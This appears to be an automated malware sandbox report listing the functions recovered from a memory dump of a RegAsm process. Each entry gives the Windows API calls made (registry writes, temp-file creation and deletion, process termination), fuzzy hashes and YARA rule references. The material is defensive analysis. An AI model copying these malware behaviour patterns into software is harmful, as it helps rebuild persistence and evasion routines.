API String ID: 3822162776-0
Opcode ID: f33407668079556dcd2fa7928d5aca83edf7cabcf37a6c80aca4bcb2ff476e31
Instruction ID: 000face8af7fcb6510f89ef8e6c00dc9f8b1930f83516027920528061c032f81
Opcode Fuzzy Hash: f33407668079556dcd2fa7928d5aca83edf7cabcf37a6c80aca4bcb2ff476e31
Instruction Fuzzy Hash: BE115BB610010DEFDB21EF69DC58FAA3BA9EB54251F044021FE06C6394CBB1C950EF60

Uniqueness

Uniqueness Score: -1.00%

Function 03F20517, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b21d643e505ab86b48b5f6d1b0f73c3bed7033a6cd3c23351b911403ea004c71
Instruction ID: 1d16046f390c68455cd3e20f1aa3eb052c5e8f9c03c35265b65c30b904066557
Opcode Fuzzy Hash: b21d643e505ab86b48b5f6d1b0f73c3bed7033a6cd3c23351b911403ea004c71
Instruction Fuzzy Hash: CAA11376D0062AEFDF22DFA4CC44AAEBFB9FF04304F184065E951A6160DB718A95EF50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1221B, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 03F12246
StrTrimA.SHLWAPI(00000000,?), ref: 03F12263
HeapFree.KERNEL32(00000000,00000000), ref: 03F12296
RtlImageNtHeader.NTDLL(00000000), ref: 03F122C1
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 03F12383

Part of subcall function 03F18502: lstrlen.KERNEL32(?,7673D3B0,00000000,00000000,03F1F5D7,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000), ref: 03F1850B
Part of subcall function 03F18502: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1852E
Part of subcall function 03F18502: memset.NTDLL ref: 03F1853D

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 03F12334
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 03F12363

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID:
API String ID: 239510280-0
Opcode ID: 164df53a9e9da4003a0c2bc22c525727bcb5f2bdfcfd90bdaf310d240203c32f
Instruction ID: 6c9b262ca786100159741fcdeb748a13bb0686e48a9202453d411603870b4927
Opcode Fuzzy Hash: 164df53a9e9da4003a0c2bc22c525727bcb5f2bdfcfd90bdaf310d240203c32f
Instruction Fuzzy Hash: C541D735A00209FFEB32EBE5EC55FAEBBA9EB54740F140424F905EA190DBB18E509B50

Uniqueness

Uniqueness Score: -1.00%

Function 03F10077, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F100D0
lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F100EE
RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 03F10117
memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F1012E
HeapFree.KERNEL32(00000000,00000000), ref: 03F10141
memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03F0762E,?,?,?,?,?), ref: 03F10150
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,03F0762E,?,?,?), ref: 03F101B4

Part of subcall function 03F21412: RtlLeaveCriticalSection.NTDLL(?), ref: 03F2148F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: b67a500fa8b677a7de61e847347c2bec589ef92c9df317e12cd4fba725af4ee5
Instruction ID: e48c20d638e16c0c42f2873c0641f2faa22963ae5f4022d396c5df4a6847e96f
Opcode Fuzzy Hash: b67a500fa8b677a7de61e847347c2bec589ef92c9df317e12cd4fba725af4ee5
Instruction Fuzzy Hash: EE419F3590031AEFDB22EFA5EC44B9EBBB9FF04350F154065F805AA160CB759AA0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F203B7, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 03F203E0
RtlEnterCriticalSection.NTDLL(00000000), ref: 03F20423
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03F2043E
CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 03F20494
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 03F204EF
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 03F204FD
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F20508

Part of subcall function 03F101CC: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 03F101E0
Part of subcall function 03F101CC: memcpy.NTDLL(00000000,03F1EC23,?,?,-00000005,?,03F1EC23,00000001,00000000,-00000005,00000001), ref: 03F10209
Part of subcall function 03F101CC: RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 03F10232
Part of subcall function 03F101CC: RegCloseKey.ADVAPI32(?,?,03F1EC23,00000001,00000000,-00000005,00000001), ref: 03F1025D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID:
API String ID: 3181710096-0
Opcode ID: 9f8059a35f02a147e76ea5f92cd1530ba69bf56ea0980571179215b5bafb373a
Instruction ID: 1955b82c7fe541edc17a44f7490f422e78d1260bd3baf6d14f796ea16a83cb97
Opcode Fuzzy Hash: 9f8059a35f02a147e76ea5f92cd1530ba69bf56ea0980571179215b5bafb373a
Instruction Fuzzy Hash: B341BC73A0021BEFEB21EFA5DC99F6A7BA9EB14340F188024F905DA194DF70D941DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F139D7, Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(03F2C00C), ref: 03F139E9
lstrcpy.KERNEL32(00000000), ref: 03F13A25

Part of subcall function 03F1182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,03F136F0,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F1183A
Part of subcall function 03F1182B: mbstowcs.NTDLL ref: 03F11856

GetLastError.KERNEL32(00000000), ref: 03F13AB4
HeapFree.KERNEL32(00000000,?), ref: 03F13ACB
InterlockedDecrement.KERNEL32(03F2C00C), ref: 03F13AE2
DeleteFileA.KERNEL32(00000000), ref: 03F13B03
HeapFree.KERNEL32(00000000,00000000), ref: 03F13B13

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID:
API String ID: 908044853-0
Opcode ID: 05458409184d23753244768012072c9aea07287a0fb4e4be21989f995b9d2469
Instruction ID: 10e7bcd6f88a47a6b164e271aadd112fbcd792b531b1b3274ba084db3e277db8
Opcode Fuzzy Hash: 05458409184d23753244768012072c9aea07287a0fb4e4be21989f995b9d2469
Instruction Fuzzy Hash: 8331033EA00229FBCB21EFA5EC54AADBBB8EF44741F154026F905DA150D7748A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F012B4, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 03F012FA
StrTrimA.SHLWAPI(?,?), ref: 03F01318
StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 03F01381
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 03F013A2
DeleteFileA.KERNEL32(?,00003219), ref: 03F013C4
HeapFree.KERNEL32(00000000,?), ref: 03F013D3
HeapFree.KERNEL32(00000000,?,00003219), ref: 03F013EB

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: 3056ff7e8560442b7b335d17f78aa6beaef50cfd36044222b747932d3ce8704e
Instruction ID: 5202395c39b9ed653c6af811ed77a2ab0176a1668681c6f67ebab9dafab7b941
Opcode Fuzzy Hash: 3056ff7e8560442b7b335d17f78aa6beaef50cfd36044222b747932d3ce8704e
Instruction Fuzzy Hash: 0631BF3660430AEFE720EBA8EC14F5AB7ECEF54B04F080124FA44DB194D764E9069BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03F23775, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,03F14CDE,00000000), ref: 03F2378F
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 03F237A4
memset.NTDLL ref: 03F237B1
HeapFree.KERNEL32(00000000,00000000,?,03F14CDD,?,?,00000000,?,00000000,03F17732,?,00000000), ref: 03F237CE
memcpy.NTDLL(?,?,03F14CDD,?,03F14CDD,?,?,00000000,?,00000000,03F17732,?,00000000), ref: 03F237EF

Strings

chun, xrefs: 03F2386B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: chun
API String ID: 2362494589-3058818181
Opcode ID: dd5e15251d9de11a616ec9e5121de17a343c1759b58d6d0220165b88eda61a22
Instruction ID: e02665e30c7df4f1cf4fedd21188cab986201bc1ab197d9c8e04afeaefac1fc1
Opcode Fuzzy Hash: dd5e15251d9de11a616ec9e5121de17a343c1759b58d6d0220165b88eda61a22
Instruction Fuzzy Hash: 8D31CDBA50071AEFD730EF59DC54E66BBE8EF14310F05852AE959CB260D730E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1DEE5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

lstrlen.KERNEL32(00000000,?,00000F00), ref: 03F1DF09

Part of subcall function 03F067EB: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,03F1DF2D,?,00000000,000000FF,?,00000F00), ref: 03F067FC
Part of subcall function 03F067EB: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,03F1DF2D,?,00000000,000000FF,?,00000F00), ref: 03F06803
Part of subcall function 03F067EB: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 03F06815
Part of subcall function 03F067EB: _snprintf.NTDLL ref: 03F0683B
Part of subcall function 03F067EB: _snprintf.NTDLL ref: 03F0686F
Part of subcall function 03F067EB: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 03F0688C

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 03F1DFA3
HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 03F1DFC0
DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 03F1DFC8
HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 03F1DFD7

Strings

s:, xrefs: 03F1DF99

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:
API String ID: 2960378068-2363032815
Opcode ID: f19f620d1b494bfd17c336f3783f9368c3fcc82c303154715376c67d53355983
Instruction ID: db7ab549eb45303c052647f51e4f72209f59a46a882866a0b1b7f04e9cf4444a
Opcode Fuzzy Hash: f19f620d1b494bfd17c336f3783f9368c3fcc82c303154715376c67d53355983
Instruction Fuzzy Hash: 6D31507690021AEFDB20EFE9DD94FAEBBBCEF18210F040555F515E7241EBB49A108B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D465, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 03F0D47B
lstrcmpiW.KERNEL32(00000000,?,?,?,00000000,?,?,?,03F07110), ref: 03F0D4B3
lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,?,?,03F07110), ref: 03F0D4C8
lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03F07110), ref: 03F0D4CF
CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,03F07110), ref: 03F0D4F7
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,03F07110), ref: 03F0D523
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F0D541

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 479e0eab0c176f2d6dbdaa7d98de2464fb94cdc16a4902bbd0890cd97a30bf26
Instruction ID: 27cd478d7e346cca91c61ca4d51f2b9373707cff7b88811f20207603829001dd
Opcode Fuzzy Hash: 479e0eab0c176f2d6dbdaa7d98de2464fb94cdc16a4902bbd0890cd97a30bf26
Instruction Fuzzy Hash: AD21537190030AFFDB20EFE9DC94E6BB7BCEF14244B040565F901D6194EB74EA05AB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F214A6, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F15BFF,00000000,03F2C320,03F2C340,?,?,03F15BFF,03F17ECD,03F2C320), ref: 03F214B6
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 03F214CC
lstrlen.KERNEL32(03F17ECD,?,?,03F15BFF,03F17ECD,03F2C320), ref: 03F214D4
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F214E0
lstrcpy.KERNEL32(03F2C320,03F15BFF), ref: 03F214F6
HeapFree.KERNEL32(00000000,00000000,?,?,03F15BFF,03F17ECD,03F2C320), ref: 03F2154A
HeapFree.KERNEL32(00000000,03F2C320,?,?,03F15BFF,03F17ECD,03F2C320), ref: 03F21559

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: ea3b68244d31267f77e28f18d33cdd86fa7595bdcce151f859d653223b17c008
Instruction ID: d51c13eaa7da104e60fd8975add0d4f626c2664d545ddd1e4ac1e0a60f2c2252
Opcode Fuzzy Hash: ea3b68244d31267f77e28f18d33cdd86fa7595bdcce151f859d653223b17c008
Instruction Fuzzy Hash: 86212931500289FFEB329FA9DC44FAABF6AEF56250F140098E85597395C771EC02DB64

Uniqueness

Uniqueness Score: -1.00%

Function 03F13ECE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,03F108D4,00000000), ref: 03F13EF2

Part of subcall function 03F0BB73: lstrcpy.KERNEL32(-000000FC,00000000), ref: 03F0BBAD
Part of subcall function 03F0BB73: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 03F0BBBF
Part of subcall function 03F0BB73: GetTickCount.KERNEL32 ref: 03F0BBCA
Part of subcall function 03F0BB73: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 03F0BBD6
Part of subcall function 03F0BB73: lstrcpy.KERNEL32(00000000), ref: 03F0BBF0

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpy.KERNEL32(00000000), ref: 03F13F2D
wsprintfA.USER32 ref: 03F13F40
GetTickCount.KERNEL32 ref: 03F13F55
wsprintfA.USER32 ref: 03F13F6A

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Strings

"%S", xrefs: 03F13F3A

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"
API String ID: 1152860224-1359967185
Opcode ID: 29d1565eb6a445d87efe9b22e498e3db49079aeb2b32d0f9eba6e57d3102e3f0
Instruction ID: e0ff40c4c08c797b8b498f36f96484bd63260d2df6663edb975c852d085891db
Opcode Fuzzy Hash: 29d1565eb6a445d87efe9b22e498e3db49079aeb2b32d0f9eba6e57d3102e3f0
Instruction Fuzzy Hash: B8119D7650031AFFC220FB69AC58E5FBBACDF94250B058015FE099B245DA78D801ABB1

Uniqueness

Uniqueness Score: -1.00%

Function 03F011F1, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,03F1C83A,?), ref: 03F01232
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,03F1C83A,?,00000000,00000000,00000000,00000000,00000000), ref: 03F012A5

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: a5b64e0e096c9a3c11df3efa08757f2d4a69770e3ee604a9e8c18212c52e0768
Instruction ID: 54d16e48cf66d53d0f50c386085dda69458e428dada801b42d9fa3eeba184b18
Opcode Fuzzy Hash: a5b64e0e096c9a3c11df3efa08757f2d4a69770e3ee604a9e8c18212c52e0768
Instruction Fuzzy Hash: 8411E335140319FBD331BBA9AC98F6F7F6CEB517A1F100120FA11D51E1D7A15C54AAE0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1EE2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08AA1: lstrlen.KERNEL32(00000000,00000000,74E481D0,00000000,?,?,?,03F1EE45,?,00000000,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F08B08
Part of subcall function 03F08AA1: sprintf.NTDLL ref: 03F08B29

lstrlen.KERNEL32(00000000,74E481D0,?,00000000,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE57
lstrlen.KERNEL32(?,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE5F

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

strcpy.NTDLL ref: 03F1EE76
lstrcat.KERNEL32(00000000,?), ref: 03F1EE81

Part of subcall function 03F0B384: lstrlen.KERNEL32(?,?,?,00000000,?,03F1EE90,00000000,?,?,?,03F05A2C,00000000,043AB188), ref: 03F0B395

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE9E

Part of subcall function 03F126E2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,03F1EEAA,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F126EC
Part of subcall function 03F126E2: _snprintf.NTDLL ref: 03F1274A

Strings

=, xrefs: 03F1EE98

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 79fbc4f880b43488cd5e7c5fe617925a325c16c5b61b0ec50f055b33a7a4500b
Instruction ID: db888bd1ef8d0a9f5187660e9bd5a04ed8da02fc52a945c9549d3db2ceea6de3
Opcode Fuzzy Hash: 79fbc4f880b43488cd5e7c5fe617925a325c16c5b61b0ec50f055b33a7a4500b
Instruction Fuzzy Hash: 9B11C637901329BB4722FBBCAC44C6F77AD9F955503094015FE01EB241DE79CD02A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E027, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03F1E058
wcstombs.NTDLL ref: 03F1E069

Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7DD
Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7EC

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 03F1E08A
TerminateProcess.KERNEL32(00000000,00000000), ref: 03F1E099
CloseHandle.KERNEL32(00000000), ref: 03F1E0A0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03F1E0AF
WaitForSingleObject.KERNEL32(00000000), ref: 03F1E0BF

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 76fd58387e1395149efa3cc895277b341771baf9d2729367fa39e5166d055a07
Instruction ID: 940d344c6e04fd33400af6b5af5383a333c39a302cb9069996c307ed176b52ba
Opcode Fuzzy Hash: 76fd58387e1395149efa3cc895277b341771baf9d2729367fa39e5166d055a07
Instruction Fuzzy Hash: D411B23150021AFBD730AB55EC58FAABB68FB20755F180010FD05A61E4C7B1EC60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0BB73, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

lstrcpy.KERNEL32(-000000FC,00000000), ref: 03F0BBAD
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 03F0BBBF
GetTickCount.KERNEL32 ref: 03F0BBCA
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 03F0BBD6
lstrcpy.KERNEL32(00000000), ref: 03F0BBF0

Strings

